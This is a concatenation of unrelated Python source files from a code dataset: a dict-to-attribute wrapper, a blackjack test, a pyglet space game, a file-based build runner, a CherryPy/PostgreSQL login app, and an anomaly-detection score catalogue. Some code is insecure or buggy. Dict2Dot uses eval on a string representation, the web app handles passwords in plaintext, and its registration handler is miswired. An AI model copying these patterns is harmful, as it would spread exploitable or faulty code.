conn.execute(
model.users.update().values(
team_id=team_id,
).where(model.users.c.id == user_id))
return util.response_success()
# TODO: add /bot, /match endpoints that redirect to corresponding
# endpoints for team leader (with HTTP redirect?)
``` |
{
"source": "jpc4242/python-dict2dot",
"score": 4
} |
#### File: python-dict2dot/dict2dot/__init__.py
```python
import re
class Dict2Dot(dict):
'''
Dict2Dot class: "the main class"
Arguments:
(dictionary, optional): A preexistent dictionary may be passed
'''
def __init__(self, orig={}):
# Set a preexistent dict into self
for key, value in orig.items():
self.__setattr__(key, value)
def __getattr__(self, key):
# Return a value from the dict (even nested)
return self[key]
def __setattr__(self, key, value):
# Set values, including nested dicts, so that parent.child.son can be acessed
if isinstance(value, dict):
self[key] = Dict2Dot(value)
else:
self[key] = value
def dict(self) -> dict:
'''Return updated dictionary'''
return eval(str(self))
def __str__(self) -> str:
'''String representation of the dictionary'''
return re.sub('<Dict2Dot at \d+: ', '', re.sub('>', '', repr(self)))
def __repr__(self) -> str:
return f'<Dict2Dot at {id(self)}: {dict.__repr__(self)}>'
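

# Illustrative usage (added; not part of the original module): nested dicts
# become attribute-accessible, and dict() converts back to a plain dict.
if __name__ == "__main__":
    d2d = Dict2Dot({"parent": {"child": 1}})
    print(d2d.parent.child)          # 1
    d2d.other = {"nested": "value"}
    print(d2d.other.nested)          # value
    print(type(d2d.dict()))          # <class 'dict'>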
``` |
{
"source": "jpc644/blackjack_game",
"score": 4
} |
#### File: blackjack_game/test/blackjack_test.py
```python
from app.blackjack_game import draw_a_card
def test_draw_a_card():
deck=[
{2,"clubs",2,2,1},
{3,"clubs",3,3,1},
{4,"clubs",4,4,1},
{5,"clubs",5,5,1},
{6,"clubs",6,6,1},
{7,"clubs",7,7,1},
{8,"clubs",8,8,1},
{9,"clubs",9,9,1},
{10,"clubs",10,10,1}
]
    card, deck = draw_a_card(deck)
    # assert that the card is a dictionary and that it has certain keys we expect it to have
    # count the number of remaining cards in the active deck and assert the length
    # is one less than the starting deck, to ensure a card was removed from the deck
    assert len(deck) == 8  # started with 9 cards, one was drawn
``` |
{
"source": "jpcallanta/spacecow",
"score": 3
} |
#### File: spacecow/lib/window.py
```python
import pyglet
from math import *
from random import randint
from lib.player import Player
from lib.enemy import Enemy
class Window(pyglet.window.Window):
player = None
enemy_qty = 100
enemy = []
label_mouse_xy = None
mouse_x = 0
mouse_y = 0
# Class initializer
def __init__(self, size_x, size_y, resize):
super(Window, self).__init__(resizable = resize, visible = True, vsync = False)
self.set_size(size_x, size_y)
self.set_caption('SpaceCow')
self.maximize()
self.player = Player((self.width / 2), (self.height / 2), 0, "resources/ship.png")
for enemies in range(self.enemy_qty):
self.enemy.append(Enemy((self.width / 2), (self.height / 2), 0, "resources/cow.png"))
for e in self.enemy:
e.x_pos = randint(0, self.width)
e.y_pos = randint(0, self.height)
e.rotation = randint(0, 360)
self.player.x_pos = self.width / 2
self.player.y_pos = self.height / 2
self.label_mouse_xy = pyglet.text.Label("Mouse Location")
self.play_bg_music()
def play_bg_music(self):
bg_music = pyglet.media.Player()
music = pyglet.media.load('resources/635964_A-Heros-Destiny.mp3')
bg_music.queue(music)
bg_music.eos_action = pyglet.media.Player.EOS_LOOP
bg_music.play()
def follow_mouse(self, player, timer, speed):
player.c_val = sqrt((self.mouse_x - player.x_pos) ** 2 + \
(self.mouse_y - player.y_pos) ** 2)
player.x_pos -= ((player.x_pos - self.mouse_x) / player.c_val * speed * timer)
player.y_pos -= ((player.y_pos - self.mouse_y) / player.c_val * speed * timer)
delta_x = player.x_pos - self.mouse_x
delta_y = player.y_pos - self.mouse_y
if player.c_val > 1.0:
player.rotation = atan2(delta_y, delta_x) / pi * 180 * -1
def follow(self, enemy, timer, speed):
enemy.c_val = sqrt((enemy.x_pos - self.player.x_pos) ** 2 + \
(enemy.y_pos - self.player.y_pos) ** 2)
enemy.x_pos -= ((enemy.x_pos - self.player.x_pos) / enemy.c_val * speed * timer)
enemy.y_pos -= ((enemy.y_pos - self.player.y_pos) / enemy.c_val * speed * timer)
delta_x = enemy.x_pos - self.player.x_pos
delta_y = enemy.y_pos - self.player.y_pos
if enemy.c_val > 1.0:
enemy.rotation = atan2(delta_y, delta_x) / pi * 180 * -1
def update(self, dt):
self.label_mouse_xy.text = \
"mouse_x: %d mouse_y: %d | player_x: %d player_y: %d | delta: %f | rotation: %f" % \
(self.mouse_x,
self.mouse_y,
self.player.x_pos,
self.player.y_pos,
self.player.c_val,
self.player.rotation)
self.follow_mouse(self.player, dt, self.player.speed)
for e in self.enemy:
self.follow(e, dt, 10)
def on_draw(self):
self.clear()
self.player.draw_player()
for e in self.enemy:
e.draw_player()
self.label_mouse_xy.draw()
def on_mouse_motion(self, x, y, dx, dy):
self.label_mouse_xy.x = 10.0
self.label_mouse_xy.y = 10.0
self.mouse_x = x
self.mouse_y = y
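
# Illustrative entry point (added; not part of the original module). Shows how
# this Window is typically driven by pyglet's clock; the window size, update
# rate, and resource files are assumptions.
#
#   import pyglet
#   from lib.window import Window
#
#   window = Window(800, 600, True)
#   pyglet.clock.schedule_interval(window.update, 1 / 60.0)
#   pyglet.app.run()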
``` |
{
"source": "jpcaram/simplebuilder",
"score": 3
} |
#### File: simplebuilder/simplebuilder/simplebuilder.py
```python
import os
from typing import List, Dict
import logging
import sys
class CannotBuildError(Exception):
pass
class Builder:
ALWAYS = 1
"""Always run the task's action regardless of requirements and outputs."""
PRESENT = 2
"""Targets must be present for the task to be up to date."""
OLDER = 4
"""Targets must be older than requiring tasks targets for a task to
be considered up to date."""
IGNOREPRESENT = 8
"""If a requirement has the PRESENT flag, ignore its date."""
def __init__(self):
self.logger = logging.getLogger('Builder')
self.logger.propagate = False
self.logger.setLevel(logging.ERROR)
for h in self.logger.handlers:
self.logger.removeHandler(h)
h = logging.StreamHandler(sys.stdout)
h.setFormatter(logging.Formatter('%(name)s - %(levelname)s - %(message)s'))
self.logger.addHandler(h)
self.logger.debug(f'{self.__class__.__name__}.__init__()')
self.tasks: List[Dict] = []
"""List of tasks"""
self.default_task = None
"""Name of the default task"""
def get_task_by_name(self, name):
"""
Get the task definition with the given name.
:param name: str - name of the task.
:return: Task definition or None if it does not exist.
"""
for task in self.tasks:
if 'name' in task and task['name'] == name:
return task
return None
def get_task_by_output(self, output):
"""
Get the task that generates the specified output. This means, output
is listed in the task's definition output list.
:param output: An output generated by some task/
:return: Task definition or None.
"""
for task in self.tasks:
if 'outputs' in task and output in task['outputs']:
return task
def run_(self, t=None):
"""
Internal run method.
:param t: Task name or definition
:return: True if the task ran. False otherwise.
"""
self.logger.debug(f'{self.__class__.__name__}.run_({t})')
# Run the default task if not specified.
t = t or self.default_task
task = None
if isinstance(t, dict):
task = t
if task is None:
task = self.get_task_by_name(t)
if task is None:
task = self.get_task_by_output(t)
if task is None:
raise RuntimeError('Task not found: {}'.format(t))
# Requirements? If so, recurse into them.
reqtasks = []
req_dates = []
newest_req_t = 0 # Beginning of times.
if 'reqs' in task:
for req in task['reqs']:
reqtask = self.get_task_by_output(req)
if reqtask is not None and reqtask not in reqtasks:
self.run_(reqtask) # Run requirement task
reqtasks.append(reqtask)
# Newest (in time) requirement
try:
req_dates = []
for req in task['reqs']:
rtask = self.get_task_by_output(req)
# This requirement is not to be ignored?
if (not rtask) or \
('flags' not in rtask) or \
('flags' not in task) or \
not (Builder.IGNOREPRESENT & task['flags']):
req_dates.append(os.path.getmtime(req))
newest_req_t = max(req_dates)
except FileNotFoundError as e:
raise CannotBuildError(str(e))
except ValueError as e:
pass # req_dates is empty.
# This task does not have requirements, or all requirements
# are ignored in the date comparison.
if 'reqs' not in task or len(req_dates) == 0:
# TODO: Must define how to handle. Force make for now.
if 'action' in task:
if ('flags' not in task) or (Builder.ALWAYS & task['flags']):
task['action'](task)
return True
if Builder.PRESENT & task['flags']:
try:
[os.path.getmtime(o) for o in task['outputs']]
except FileNotFoundError:
self.logger.info(task['name'] + ' is NOT up to date. Running.')
task['action'](task)
return True
self.logger.info(task['name'] + ' is up to date.')
return False # Did not run
else:
raise CannotBuildError("No action to build target")
# Oldest output
try:
oldest_output_t = min([os.path.getmtime(o) for o in task['outputs']])
except FileNotFoundError as e:
# Missing output, must run
if 'action' in task:
self.logger.info(task['name'] + ' is NOT up to date. Running.')
task['action'](task)
return True
else:
raise CannotBuildError("No action to build target")
# All outputs are present. Now let's compare dates with the requirements.
if newest_req_t > oldest_output_t:
# Requirement is newer, run actions
if 'action' in task:
self.logger.info(task['name'] + ' is NOT up to date. Running.')
task['action'](task)
return True
else:
raise CannotBuildError("No action to build target")
self.logger.info(task['name'] + ' is up to date.')
return False # Did not run
def run(self, t=None):
"""
Run a task.
:param t: Task specification. Can be a task name, or an output generated by
some task. If None (default) runs the default_task.
:return: True if the task ran. False otherwise.
"""
try:
return self.run_(t=t)
except CannotBuildError as e:
self.logger.error("ERROR: Could not build out-of-date target: {}".format(str(e)))
return False
def clean(self, t=None):
"""
Removes all the outputs of a task. If the task is not specified,
all outputs of all tasks are removed.
:param t: Task specification. Can be a task name, or an output generated by
some task.
:return: None
"""
        if t is None:
            # no task specified: clean every task and stop here
            for t_ in self.tasks:
                self.clean(t=t_)
            return
        task = None
        if isinstance(t, dict):
            task = t
        if task is None:
            task = self.get_task_by_name(t)
        if task is None:
            task = self.get_task_by_output(t)
        if task is None:
            raise RuntimeError('Task not found: {}'.format(t))
for op in task['outputs']:
try:
os.remove(op)
except OSError:
pass
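

# Illustrative usage sketch (added; not part of the original module). The file
# names and the copy action are hypothetical; the task keys ('name', 'reqs',
# 'outputs', 'action') follow the conventions documented above.
if __name__ == "__main__":
    def copy_action(task):
        # naive build step: copy the single requirement into the single output
        with open(task["reqs"][0]) as src, open(task["outputs"][0], "w") as dst:
            dst.write(src.read())

    builder = Builder()
    builder.tasks = [
        {"name": "copy", "reqs": ["input.txt"], "outputs": ["output.txt"], "action": copy_action},
    ]
    builder.default_task = "copy"
    builder.run()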
``` |
{
"source": "JPCatarino/amsG103CR",
"score": 3
} |
#### File: amsG103CR/CityRunning/webapp.py
```python
import cherrypy
from jinja2 import Environment, PackageLoader, select_autoescape
import os
from datetime import datetime
import psycopg2
from psycopg2 import Error
class WebApp(object):
def __init__(self):
self.env = Environment(
loader=PackageLoader('webapp', 'HTML'),
autoescape=select_autoescape(['html', 'xml'])
)
self.connect_string = "dbname='ams103' user='ams103' password='<PASSWORD>' host='deti-aulas.ua.pt' port=5432"
self.users = ["Atleta", "Admin", "Organizador", "Patrocinador"]
########################################################################################################################
# Utilities
def set_user(self, username=None):
if username == None:
cherrypy.session['user'] = {'is_authenticated': False, 'username': ''}
else:
cherrypy.session['user'] = {'is_authenticated': True, 'username': username}
def get_user(self):
if not 'user' in cherrypy.session:
self.set_user()
return cherrypy.session['user']
def render(self, tpg, tps):
template = self.env.get_template(tpg)
return template.render(tps)
def db_connection(conString):
try:
conn = psycopg2.connect(conString)
return conn
except Error as e:
print(e)
return None
    def do_authenticationDB(self, usr, pwd):
        db_con = WebApp.db_connection(self.connect_string)
        # parameterized query; fetch the row before comparing the password
        sql = "SELECT pwd, typeu FROM utilizador WHERE username = %s;"
        curr = db_con.cursor()
        curr.execute(sql, (usr,))
        row = curr.fetchone()
        user_type = None
        if row is not None and row[0] == pwd:
            self.set_user(usr)
            user_type = row[1]
        db_con.close()
        return user_type
def do_regDB(self, usr, pwd, typeU):
if typeU not in self.users:
return None
        db_con = WebApp.db_connection(self.connect_string)
        # parameterized inserts; string values must not be interpolated unquoted
        sql = "INSERT INTO utilizador(username, password, typeU) VALUES (%s, %s, %s);"
        curr = db_con.cursor()
        curr.execute(sql, (usr, pwd, typeU))
        db_con.commit()
        sql = None
        if typeU == "Atleta":
            sql = "INSERT INTO atleta(username) VALUES (%s);"
        elif typeU == "Organizador":
            sql = "INSERT INTO organizador(username) VALUES (%s);"
        elif typeU == "Patrocinador":
            sql = "INSERT INTO patrocinador(username) VALUES (%s);"
        if sql is not None:
            curr.execute(sql, (usr,))
            db_con.commit()
        curr.close()
        db_con.close()
########################################################################################################################
# Controllers
@cherrypy.expose
    def login(self, username=None, password=None):
if username == None:
tparams = {
'title': 'Login',
'errors': False,
'user': self.get_user(),
'year': datetime.now().year,
}
return self.render('login.html', tparams)
else:
self.do_authenticationDB(username, password)
if not self.get_user()['is_authenticated']:
tparams = {
'title': 'Login',
'errors': True,
'user': self.get_user(),
'year': datetime.now().year,
}
return self.render('login.html', tparams)
else:
raise cherrypy.HTTPRedirect("/")
@cherrypy.expose
def logout(self):
self.set_user()
raise cherrypy.HTTPRedirect("/")
@cherrypy.expose
def create(self, usr=None, pwd=None):
if usr == None:
tparams = {
'title': 'Create',
'errors': False,
'user': self.get_user(),
'year': datetime.now().year,
}
return self.render('create.html', tparams)
else:
if not self.get_user()['is_authenticated']:
tparams = {
'title': 'Create',
'errors': True,
'user': self.get_user(),
'year': datetime.now().year,
}
return self.render('create.html', tparams)
else:
self.do_regDB(usr, pwd)
raise cherrypy.HTTPRedirect("/")
@cherrypy.expose
def shut(self):
cherrypy.engine.exit()
if __name__ == '__main__':
conf = {
'/': {
'tools.sessions.on': True,
'tools.staticdir.root': os.path.abspath(os.getcwd())
},
'/HTML/assets': {
'tools.staticdir.on': True,
'tools.staticdir.dir': './HTML/assets'
}
}
cherrypy.quickstart(WebApp(), '/', conf)
``` |
{
"source": "jpcbertoldo/ad-scores",
"score": 3
} |
#### File: adscores/data/fcdd_2021_table2.py
```python
from pathlib import Path
import pandas as pd
txt_fifle = Path(__file__).parent / "fcdd_2021_table2.txt" # contains the data part of the table above
str_data = txt_fifle.read_text()
nlines_per_group = 11
# this is in the order of the lines inside each group of 11 lines
METHODS_NAMES = [
"AE-SS", "AE-L2", "Ano-GAN", "CNNFD",
"VEVAE", "SMAI", "GDR", "P-NET",
"FCDD-unsupervised", "FCDD-semi-supervised",
]
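# Expected layout of fcdd_2021_table2.txt (illustrative, inferred from the
# parsing below): groups of 11 lines, a class name followed by one score per
# method, in METHODS_NAMES order, e.g.
#
#   carpet
#   0.87
#   0.59
#   ...            (10 values in total)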
lines = str_data.strip().split("\n")
line_groups = [
lines[(i * nlines_per_group):((i + 1) * nlines_per_group)]
for i in range(len(lines) // nlines_per_group)
]
line_groups = [
{
"class": g[0].lower().replace(" ", "-"),
**{
col: float(val)
for col, val in zip(METHODS_NAMES, g[1:])
},
}
for g in line_groups
]
df = pd.DataFrame.from_records(data=line_groups).set_index("class")
def get_aess():
return df[["AE-SS"]].rename(columns={"AE-SS": "score"})
def get_ael2():
return df[["AE-L2"]].rename(columns={"AE-L2": "score"})
def get_ano_gan():
return df[["Ano-GAN"]].rename(columns={"Ano-GAN": "score"})
def get_cnnfd():
return df[["CNNFD"]].rename(columns={"CNNFD": "score"})
def get_vevae():
return df[["VEVAE"]].rename(columns={"VEVAE": "score"})
def get_smai():
return df[["SMAI"]].rename(columns={"SMAI": "score"})
def get_gdr():
return df[["GDR"]].rename(columns={"GDR": "score"})
def get_pnet():
return df[["P-NET"]].rename(columns={"P-NET": "score"})
def get_fcdd_unsupervised():
return df[["FCDD-unsupervised"]].rename(columns={"FCDD-unsupervised": "score"})
def get_fcdd_semi_supervised():
return df[["FCDD-semi-supervised"]].rename(columns={"FCDD-semi-supervised": "score"})
```
#### File: ad-scores/adscores/scores.py
```python
from collections import defaultdict
from dataclasses import dataclass
from enum import Enum
import traceback
from typing import Dict, List, Optional, Set, Tuple, Union
import warnings
from numpy import ndarray
from pandas import DataFrame
from pybtex.database.input import bibtex
from pathlib import Path
from adscores import constants
from adscores.data import fcdd_2021_table2
PAPERS_BIB_FPATH = Path(__file__).parent / "papers.bib"
bib_parser = bibtex.Parser()
bib_data = bib_parser.parse_file(str(PAPERS_BIB_FPATH))
class MissingInfo(KeyError):
pass
class UnknownDataset(Exception):
pass
class UnknownMetric(Exception):
pass
class DatasetKey(Enum):
mvtecad = "MVTec-AD"
cifar10 = "CIFAR-10"
cifar100 = "CIFAR-100"
fmnist = "Fashion-MNIST"
imagenet30ad = "ImageNet30AD"
imagenet1k = "ImageNet1k"
@staticmethod
def names() -> Tuple[str]:
return tuple(e.name for e in DatasetKey)
@staticmethod
def values() -> Tuple[str]:
return tuple(e.value for e in DatasetKey)
DATASETS_CLASSES_ABC = {
DatasetKey.mvtecad: constants.MVTECAD_CLASSES_ABC,
DatasetKey.cifar10: constants.CIFAR10_CLASSES_ABC,
DatasetKey.imagenet30ad: constants.IMAGENET_30AD_CLASSES_ABC,
DatasetKey.fmnist: constants.FMNIST_CLASSES_ABC,
}
DATASETS_CLASSES_ABC = {k.value: v for k, v in DATASETS_CLASSES_ABC.items()}
class MetricKey(Enum):
pixel_wise_auroc = "pixel_wise_auroc"
@staticmethod
def names() -> Tuple[str]:
return tuple(e.name for e in MetricKey)
@staticmethod
def values() -> Tuple[str]:
return tuple(e.value for e in MetricKey)
class SupervisionKey(Enum):
unsupervised = "unsupervised"
semi_supervised = "semi-supervised"
supervised = "supervised"
self_supervised = "self-supervised"
class TagKey(Enum):
src = "source"
src_detail = "source-detail"
# where the numbers where actually taken from by the source
# not necessarily the paper where the method was published
src_original = "source-original"
method = "method"
method_ref = "method-reference"
method_abbr = "method-abbreviation"
dataset = "dataset"
dataset_ref = "dataset-reference"
metric = "metric"
metric_perclass = "metric-per-class"
metric_percentage = "metric-percentage"
# number of experiences that were averaged to get the score value
metric_niter = "metric-number-of-iterations"
oe = "outlier-exposure"
pretraining = "pretraining"
supervision = "supervision"
REFERENCE_TAGKEYS = (
TagKey.src,
TagKey.src_original,
TagKey.method_ref,
TagKey.dataset_ref,
)
class TagValues(Enum):
yes = "yes"
no = "no"
@dataclass
class Tag:
key: TagKey
value: str
def __post_init__(self):
if isinstance(self.value, Enum):
self.value = self.value.value
@dataclass
class Score:
value: Union[int, float, ndarray, DataFrame] = None
tags: Tuple[Tag] = ()
def __post_init__(self):
# make sure the tag keys are unique
tagkeys = set()
for tag in self.tags:
assert isinstance(tag, Tag), f"{tag=}"
assert isinstance(tag.key, TagKey), f"{tag.key=}"
if tag.key in tagkeys:
raise KeyError(f"Tag key {tag.key} already exists. Tags must be unique. Tags: {self.tags}")
tagkeys.add(tag.key)
@property
def tag_keys(self) -> Set[str]:
return {tag.key for tag in self.tags}
def __getitem__(self, key: TagKey) -> str:
assert isinstance(key, TagKey)
for tag in self.tags:
if tag.key == key:
return tag.value
else:
raise MissingInfo(f"Tag key {key=} not found in {self.tags=}")
def tags_as_dict(self) -> dict:
return {tag.key.value: tag.value for tag in self.tags}
SCORES = []
# =============================================================================
# from liznerski_explainable_2021
# <NAME>., <NAME>., <NAME>., <NAME>., <NAME>., <NAME>., 2021. Explainable Deep One-Class Classification, in: International Conference on Learning Representations. Presented at the International Conference on Learning Representations.
# Table 3
# =============================================================================
SCORES.extend([
Score(
value=fcdd_2021_table2.get_aess(),
tags=(
Tag(key=TagKey.src, value="liznerski_explainable_2021"),
Tag(key=TagKey.src_detail, value="Table 2"),
Tag(key=TagKey.src_original, value="bergmann_mvtec_2019"),
Tag(key=TagKey.method, value="Scores for Self-Similarity"),
Tag(key=TagKey.method_abbr, value="AE-SS"),
Tag(key=TagKey.method_ref, value="bergmann_mvtec_2019"),
Tag(key=TagKey.dataset, value=DatasetKey.mvtecad),
Tag(key=TagKey.dataset_ref, value="bergmann_mvtec_2019"),
Tag(key=TagKey.metric, value=MetricKey.pixel_wise_auroc),
Tag(key=TagKey.metric_perclass, value=TagValues.yes),
)
),
Score(
value=fcdd_2021_table2.get_ael2(),
tags=(
Tag(key=TagKey.src, value="liznerski_explainable_2021"),
Tag(key=TagKey.src_detail, value="Table 2"),
Tag(key=TagKey.src_original, value="bergmann_mvtec_2019"),
Tag(key=TagKey.method, value="L2 Autoencoder"),
Tag(key=TagKey.method_abbr, value="AE-L2"),
Tag(key=TagKey.method_ref, value="bergmann_mvtec_2019"),
Tag(key=TagKey.dataset, value=DatasetKey.mvtecad),
Tag(key=TagKey.dataset_ref, value="bergmann_mvtec_2019"),
Tag(key=TagKey.metric, value=MetricKey.pixel_wise_auroc),
Tag(key=TagKey.metric_perclass, value=TagValues.yes),
)
),
Score(
value=fcdd_2021_table2.get_ano_gan(),
tags=(
Tag(key=TagKey.src, value="liznerski_explainable_2021"),
Tag(key=TagKey.src_detail, value="Table 2"),
Tag(key=TagKey.src_original, value="bergmann_mvtec_2019"),
Tag(key=TagKey.method, value="AnoGAN"),
Tag(key=TagKey.method_abbr, value="AnoGAN"),
Tag(key=TagKey.method_ref, value="schlegl_unsupervised_2017"),
Tag(key=TagKey.dataset, value=DatasetKey.mvtecad),
Tag(key=TagKey.dataset_ref, value="bergmann_mvtec_2019"),
Tag(key=TagKey.metric, value=MetricKey.pixel_wise_auroc),
Tag(key=TagKey.metric_perclass, value=TagValues.yes),
)
),
Score(
value=fcdd_2021_table2.get_cnnfd(),
tags=(
Tag(key=TagKey.src, value="liznerski_explainable_2021"),
Tag(key=TagKey.src_detail, value="Table 2"),
Tag(key=TagKey.src_original, value="bergmann_mvtec_2019"),
Tag(key=TagKey.method, value="CNN Feature Dictionaries"),
Tag(key=TagKey.method_abbr, value="CNNFD"),
Tag(key=TagKey.method_ref, value="napoletano_anomaly_2018"),
Tag(key=TagKey.dataset, value=DatasetKey.mvtecad),
Tag(key=TagKey.dataset_ref, value="bergmann_mvtec_2019"),
Tag(key=TagKey.metric, value=MetricKey.pixel_wise_auroc),
Tag(key=TagKey.metric_perclass, value=TagValues.yes),
)
),
Score(
value=fcdd_2021_table2.get_vevae(),
tags=(
Tag(key=TagKey.src, value="liznerski_explainable_2021"),
Tag(key=TagKey.src_detail, value="Table 2"),
Tag(key=TagKey.src_original, value="liu_towards_2020"),
Tag(key=TagKey.method, value="Visually Explained Variational Autoencoder"),
Tag(key=TagKey.method_abbr, value="VEVAE"),
Tag(key=TagKey.method_ref, value="liu_towards_2020"),
Tag(key=TagKey.dataset, value=DatasetKey.mvtecad),
Tag(key=TagKey.dataset_ref, value="bergmann_mvtec_2019"),
Tag(key=TagKey.metric, value=MetricKey.pixel_wise_auroc),
Tag(key=TagKey.metric_perclass, value=TagValues.yes),
)
),
Score(
value=fcdd_2021_table2.get_smai(),
tags=(
Tag(key=TagKey.src, value="liznerski_explainable_2021"),
Tag(key=TagKey.src_detail, value="Table 2"),
Tag(key=TagKey.src_original, value="li_superpixel_2020"),
Tag(key=TagKey.method, value="Superpixel Masking and Inpainting"),
Tag(key=TagKey.method_abbr, value="SMAI"),
Tag(key=TagKey.method_ref, value="li_superpixel_2020"),
Tag(key=TagKey.dataset, value=DatasetKey.mvtecad),
Tag(key=TagKey.dataset_ref, value="bergmann_mvtec_2019"),
Tag(key=TagKey.metric, value=MetricKey.pixel_wise_auroc),
Tag(key=TagKey.metric_perclass, value=TagValues.yes),
)
),
Score(
value=fcdd_2021_table2.get_gdr(),
tags=(
Tag(key=TagKey.src, value="liznerski_explainable_2021"),
Tag(key=TagKey.src_detail, value="Table 2"),
Tag(key=TagKey.src_original, value="dehaene_iterative_2020"),
Tag(key=TagKey.method, value="Gradient Descent Reconstruction with VAEs"),
Tag(key=TagKey.method_abbr, value="GDR"),
Tag(key=TagKey.method_ref, value="dehaene_iterative_2020"),
Tag(key=TagKey.dataset, value=DatasetKey.mvtecad),
Tag(key=TagKey.dataset_ref, value="bergmann_mvtec_2019"),
Tag(key=TagKey.metric, value=MetricKey.pixel_wise_auroc),
Tag(key=TagKey.metric_perclass, value=TagValues.yes),
)
),
Score(
value=fcdd_2021_table2.get_pnet(),
tags=(
Tag(key=TagKey.src, value="liznerski_explainable_2021"),
Tag(key=TagKey.src_detail, value="Table 2"),
Tag(key=TagKey.src_original, value="zhou_encoding_2020"),
Tag(key=TagKey.method, value="Encoding Structure-Texture Relation with P-Net for AD"),
Tag(key=TagKey.method_abbr, value="P-NET"),
Tag(key=TagKey.method_ref, value="zhou_encoding_2020"),
Tag(key=TagKey.dataset, value=DatasetKey.mvtecad),
Tag(key=TagKey.dataset_ref, value="bergmann_mvtec_2019"),
Tag(key=TagKey.metric, value=MetricKey.pixel_wise_auroc),
Tag(key=TagKey.metric_perclass, value=TagValues.yes),
)
),
Score(
value=fcdd_2021_table2.get_fcdd_unsupervised(),
tags=(
Tag(key=TagKey.src, value="liznerski_explainable_2021"),
Tag(key=TagKey.src_detail, value="Table 2"),
Tag(key=TagKey.method, value="Fully Convolutional Data Description (unsupervised)"),
Tag(key=TagKey.method_abbr, value="FCDD-unsup"),
Tag(key=TagKey.method_ref, value="liznerski_explainable_2021"),
Tag(key=TagKey.dataset, value=DatasetKey.mvtecad),
Tag(key=TagKey.dataset_ref, value="bergmann_mvtec_2019"),
Tag(key=TagKey.metric, value=MetricKey.pixel_wise_auroc),
Tag(key=TagKey.metric_perclass, value=TagValues.yes),
Tag(key=TagKey.metric_niter, value="5"),
)
),
Score(
value=fcdd_2021_table2.get_fcdd_semi_supervised(),
tags=(
Tag(key=TagKey.src, value="liznerski_explainable_2021"),
Tag(key=TagKey.src_detail, value="Table 2"),
Tag(key=TagKey.method, value="Fully Convolutional Data Description (semi-supervised)"),
Tag(key=TagKey.method_abbr, value="FCDD-semi-sup"),
Tag(key=TagKey.method_ref, value="liznerski_explainable_2021"),
Tag(key=TagKey.dataset, value=DatasetKey.mvtecad),
Tag(key=TagKey.dataset_ref, value="bergmann_mvtec_2019"),
Tag(key=TagKey.metric, value=MetricKey.pixel_wise_auroc),
Tag(key=TagKey.metric_perclass, value=TagValues.yes),
Tag(key=TagKey.metric_niter, value="5"),
)
),
])
# =============================================================================
# UTIL FUNCTIONS
# =============================================================================
def get_dataset(score: Score) -> str:
return score[TagKey.dataset]
def get_metric(score: Score) -> str:
return score[TagKey.metric]
def score_is_perclass(score: Score, assume_no=True) -> bool:
    try:
        return score[TagKey.metric_perclass] == TagValues.yes.value
    except MissingInfo:
        # when the tag is absent, optionally assume the score is not per-class
        if assume_no:
            return False
        raise
def get_dataset_classes_abc(score: Score) -> Tuple[str]:
dataset_key = score[TagKey.dataset]
try:
return DATASETS_CLASSES_ABC[dataset_key]
except KeyError as ex:
raise UnknownDataset(f"Unknown dataset classes {dataset_key=}. {score.tags=}") from ex
def _validate_and_normalize_dataset(dataset: Union[DatasetKey, str]) -> str:
if isinstance(dataset, DatasetKey):
return dataset.value
elif isinstance(dataset, str):
if dataset in DatasetKey.names():
return DatasetKey[dataset].value
elif dataset in DatasetKey.values():
return dataset
else:
raise UnknownDataset(f"Unknown dataset {dataset=}")
else:
raise TypeError(f"Expected {DatasetKey=} or {str=}, got {type(dataset)=}")
def _validate_and_normalize_metric(metric: Union[MetricKey, str]) -> str:
if isinstance(metric, MetricKey):
return metric.value
elif isinstance(metric, str):
if metric in MetricKey.names():
return MetricKey[metric].value
elif metric in MetricKey.values():
return metric
else:
raise UnknownMetric(f"Unknown metric {metric=}")
else:
raise TypeError(f"Expected {MetricKey=} or {str=}, got {type(metric)=}")
def get_perclass_scores(dataset: Union[DatasetKey, str], metric: Union[MetricKey, str]) -> DataFrame:
dataset = _validate_and_normalize_dataset(dataset)
metric = _validate_and_normalize_metric(metric)
return [
s for s in SCORES
if score_is_perclass(s)
and get_dataset(s) == dataset
and get_metric(s) == metric
]
def score_perclass_2_records(score: Score) -> List[dict]:
assert score_is_perclass(score), f"Expected per-class score, got {score.tags=}"
# score.value is expected to be a DataFrame with one column "score"
# and the index is the class names
return [
{
"class": idx,
"score": row["score"],
**score.tags_as_dict(),
}
for idx, row in score.value.iterrows()
]
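# Illustrative usage (added; not part of the original module): flatten all
# per-class MVTec-AD pixel-wise AUROC scores into records, e.g. for a DataFrame.
#
#   records = [
#       rec
#       for s in get_perclass_scores(DatasetKey.mvtecad, MetricKey.pixel_wise_auroc)
#       for rec in score_perclass_2_records(s)
#   ]
#   summary = DataFrame.from_records(records)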
# =============================================================================
# VALIDATION FUNCTIONS
# =============================================================================
def _get_unknown_refs(scores: List[Score]) -> List[str]:
unknown_refs = set()
for s in scores:
refs = [
t.value
for t in s.tags
if t.key in REFERENCE_TAGKEYS
]
for r in refs:
if r not in bib_data.entries.keys():
unknown_refs.add(r)
return sorted(list(unknown_refs))
def _get_missing_values(scores: List[Score]) -> List[str]:
missing_values = set()
for idx, s in enumerate(scores):
if s.value is None:
missing_values.add(idx)
return sorted(list(missing_values))
def validate_scores_perclass(scores: List[Score]) -> None:
for idx, s in enumerate(scores):
if not score_is_perclass(s, assume_no=True):
continue
try:
dataset_classes_abc = get_dataset_classes_abc(s)
except UnknownDataset as ex:
traceback.print_exc()
raise ex
df: DataFrame = s.value
if df is None:
warnings.warn(f"Score per class is None. Skipping. {idx=} {s.tags=}")
print("\n\n")
continue
elif not isinstance(df, DataFrame):
warnings.warn(f"Score per class is not a DataFrame. Skipping. {idx=} {s.tags=}")
print("\n\n")
continue
if not tuple(df.index.values) == dataset_classes_abc:
warnings.warn(f"Classes in score per class is wrong. Skipping. {idx=} {s.tags=}")
print("\n\n")
continue
def validate_metrics(scores: List[Score]) -> None:
for idx, s in enumerate(scores):
try:
_validate_and_normalize_metric(get_metric(s))
except (UnknownMetric, MissingInfo) as ex:
print(f"{idx=} {s.tags=}")
traceback.print_exc()
def validate_datasets(scores: List[Score]) -> None:
for idx, s in enumerate(scores):
try:
_validate_and_normalize_dataset(get_dataset(s))
except (UnknownDataset, MissingInfo) as ex:
print(f"{idx=} {s.tags=}")
traceback.print_exc()
# =============================================================================
# MAIN
# =============================================================================
if __name__ == "__main__":
unknown_refs = _get_unknown_refs(SCORES)
if len(unknown_refs) > 0:
warnings.warn(f"Unknown refs: {', '.join(unknown_refs)}")
missing_values = _get_missing_values(SCORES)
if len(missing_values) > 0:
warnings.warn(f"Missing values (index of the score in the list SCORES): {', '.join(map(str, missing_values))}")
